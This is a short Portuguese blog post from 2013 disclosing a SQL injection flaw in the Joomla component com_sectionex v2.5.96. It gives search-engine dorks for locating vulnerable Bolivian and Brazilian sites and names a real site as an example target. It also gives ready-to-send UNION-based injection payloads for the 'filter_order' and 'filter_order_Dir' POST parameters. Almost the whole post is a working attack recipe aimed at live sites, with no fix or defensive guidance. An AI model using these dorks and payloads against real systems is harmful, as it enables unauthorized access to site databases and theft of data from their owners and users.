quarta-feira, 28 de agosto de 2013

Joomla com_sectionex v2.5.96 SQL Injection vulnerabilidade

Joomla com_sectionex v2.5.96 SQL Injection vulnerabilidade

Joomla com_sectionex v2.5.96 SQL Injection vulnerabilidade

DORK:site:bo inurl:/index.php?option=com_sectionex
DORK:site:br inurl:/index.php?option=com_sectionex

[1] parâmetro "filter_order":

URL /index.php?option=com_sectionex&view=category&id=X(INT)&Itemid=Y(INT)

EXEMPLO:
http://www.lapaz.bo/index.php?option=com_sectionex&view=category&id=143&Itemid=777

EXPLOIT:POST-> filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1
limit 1 offset 10000) union all (select
1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from
dual)%23&filter_order_Dir=DESC


[2] parâmetro "filter_order_Dir":

EXEMPLO:
http://www.lapaz.bo/index.php?option=com_sectionex&view=category&id=143&Itemid=777

EXPLOIT:POST-> filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1&filter_order_Dir=DESC
limit 1 offset 10000) union all (select
1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23